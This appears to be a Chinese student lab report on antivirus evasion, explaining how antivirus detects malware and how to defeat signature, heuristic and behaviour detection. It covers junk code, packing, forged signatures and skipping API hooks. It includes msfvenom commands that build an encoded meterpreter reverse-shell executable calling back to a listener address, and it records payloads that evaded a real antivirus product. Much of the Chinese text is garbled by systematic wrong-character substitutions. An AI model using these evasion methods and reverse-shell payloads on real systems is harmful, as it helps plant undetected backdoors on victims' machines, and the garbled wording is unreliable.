20155325 Exp3 免杀原理与实践

基础问题回答

杀软是如何检测出恶意代码的？

1.1 基于特征码的检测

1.1.1 特征库举例-Snort

1.2 启发式恶意软件检测

1.3 基于行为的恶意软件检测

免杀是作什么？

通常是对恶意软件作处理，让它不被杀毒软件所检测。也是渗透测试中须要使用到的技术。

免杀的基本方法有哪些？

手工修改；
非源码

1. 数据

若是特征码定位到数据（经过IDA/OD等确认），其实很差修改，稍微不慎就会致使程序不能运行，或者影响程序运行流程或结果。

字符串，若是不影响程序逻辑，能够替换大小写；若是可有可无的数据，随意替换；等等，看状况而定。
整数，若是不影响结果，替换值，清零等等操做。
地址，基本应该不能修改，具体看状况。
PE头数据，根据PE结构具体来看，无用数据清零或修改，有用数据看状况修改。
最后，终极修改方法，找到访问数据的代码，直接修改代码访问数据的地址，数据也能够放到其余地址了，其实就如同修改源码同样修改，确定没有修改源码那么容易（见后）。
反正特征码定位到数据位置不容易修改（能够再试试后面的盲免杀）。

1. 代码

若是特征码定位到代码（也经过IDA/OD等确认），在不改变程序功能基础上，应用各类方法修改。

等价替换汇编代码，如mov eax，0能够换成xor eax，eax，直接结果相同，二进制代码不一样。
交换代码顺序，在不影响逻辑的状况下。
代码块移位，将代码块移动不用的内存位置，经过加入jmp addr跳过去执行，addr是新的代码块地址。
源码

在有源码的状况下，修改的方式就更灵活了，更简单了。

若是特征码是数据，那么修改数据位置，访问数据的代码位置等（思想类比非源码方式）。

加花指令，这是最有效也是最经常使用的方式，要点在于如何加话指令。

加数据计算代码，加减乘除各种组合。
加字符串操做代码，增长、删除、查找、替换等。
加多层跳转，跳转间加无效指令（不会执行的）。
加貌似有效的API调用，如LoadLibrary+GetProcAddr+API等。
等等。
工具免杀；
在没找到有效的特征码，或者很差修改的时候，能够试试这种方式。

资源操做

1. 加资源

使用ResHacker对文件进行资源操做，找来多个正常软件，将它们的资源加入到本身软件，如图片，版本信息，对话框等。

1. 替换资源

使用ResHacker替换无用的资源（Version等）。

1. 加签名

使用签名伪造工具，将正常软件的签名信息加入到本身软件中。

几种方式能够交替重复屡次进行组合使用。

PE操做

1. PE优化

使用PE优化工具对文件进行优化，删除0，PE头优化，附加数据等。

1. 增长节

增长节数据，随意加入无效数据。

加壳

能够将加壳简单理解为：解密器/解压器+加密器/压缩器（原始代码）。

经过加密器/压缩器将原始代码进行加密压缩，让其特征码变化隐藏，而后组装上解密器/解压器到文件中，运行是先运行解密/解压器，将加密压缩内容解密解压，而后继续运行原始代码。

1. 加冷门壳

壳也有特征，知名壳都已经被分析的很是多了，杀软基本都能查这类壳，或者自动脱壳，而后进行查杀。

因此加冷门壳，壳特征未被分析，不能自动脱壳，能够更好隐藏原始代码，获得免杀效果。

1. 加壳改壳

将经常使用壳进行修改，让壳特征变化，也能够是杀软失效。

好比修改入口，区段信息修改，入口代码移位。

能够类比为免杀壳，上面介绍的方法均可以使用。
动态行为免杀

1. 替换api

使用相同功能的API进行替换，杀软不可能拦截了全部API，因此这种方式仍是有效的。好比MoveFileEx替换MoveFile。

1. 未导出api

寻找相同功能的未导出API进行替换，杀软拦截通常是导出API，或者底层调用，寻找未导出API有必定效果。

寻找方法，经过分析目标API内部调用，找到内部一个或多个未导出API，来完成相同功能。

1. 重写api

彻底重写系统API功能（经过逆向），实现本身的对应功能API，对于ring3的行为拦截很是有效。好比实现MoveFile等。

1. api+5

ring3的API拦截经过是挂钩API头几个字节内容，而后进入杀软本身函数进行参数检查之类的。

那么若是调用API时，跳过头部几字节，就能够避开这种拦截方式。

__API:
1 push ebp;
2 mov ebp, esp;
3 mov edi, edi;
4 ...
调用时，不适用1地址，而使用4地址，而后本身函数内部还原跳过几字节的调用。

__API_MY:
push ebp;
mov ebp, esp;
mov edi, edi;
call 4

1. 底层api

该方法相似于2和3，杀软拦截API可能更加高层（语义更清楚），那就能够找更底层API进行调用，绕过拦截，好比使用NT函数。

或者经过DeviceIoControl调用驱动功能来完成API功能。

模拟系统调用。

1. 合理替换调用顺序

有时拦截行为是经过多个API组合来完成的，因此合理替换顺序，绕过杀软拦截策略，也能够绕过改行为拦截。

好比，先建立服务，再将服务对应文件拷贝过去。

1. 绕过调用源

经过调用其它进行功能来完成API的功能。比较经典的如，经过rundll32.exe来完成dll加载，经过COM来操做文件等等。

参考： 免杀技术有一套（免杀方法大集结）

实践总结与体会

越学这门课越以为心惊

离实战还缺些什么技术或步骤？

1.如何将程序悄无声息地植入对方电脑
2.如何使对方电脑的程序运行，并成功与控制端链接
3.随着时间的推移，杀软数据库会更新，被查杀的可能性增长

实践过程记录

正确使用msf编码器，msfvenom生成如jar之类的其余文件，veil-evasion，本身利用shellcode编程等免杀工具或技巧；

把上一次实验用msfvenom生成的5325bd.exe放入http://www.virscan.org/进行检测

按照教程用msfvenom屡次编译

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  -b ‘\x00’ LHOST=192.168.20.136 LPORT=443 -f exe > met-encoded.exe
 
 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  -i 10 -b ‘\x00’ LHOST=192.168.20.136 LPORT=443 -f exe > met-encoded.exe

其实检测结果并无 太大的变化

用msfvenom生成.jar和.php

用msfvenom生成shellcode，作成20155325.c

用C语言重写meterperter

把成果进行检测

把20155325.c编译成可执行文件（后更名为p5325..exe）

进行检测

经过组合应用各类技术实现恶意代码免杀

max5325.c

加壳并检测

以上的程序中：p5325.exe p5325_upx.exe在win10的360杀毒下实现免杀

可是很恶心心的事情就是
两个都回连失败

实验中遇到的问题及思考

• 问题一：想要上传到网站上检测，可是后门软件一传到主机就被杀软干掉了
• 解决：固然是选择信任它

• 问题二：在进行检测时
  

• 解决：去掉2015就好……可能年份会让这么一个网站感到时光流逝的沧桑，因此拒绝有关年纪的话题。

参考连接

• 免杀技术有一套（免杀方法大集结）
• NetSec / ExpGuides / 0x23_MAL_免杀原理与实践.md
• 20155312 张竞予 Exp1 PC平台逆向破解(5)M
• 2017-2018-2 20155303 『网络对抗技术』Exp3：免杀原理与实践
• 20145215《网络对抗》Exp3 免杀原理与实践
• 2017-2018-2 20155228 《网络对抗技术》 实验三：MAL_免杀原理与实践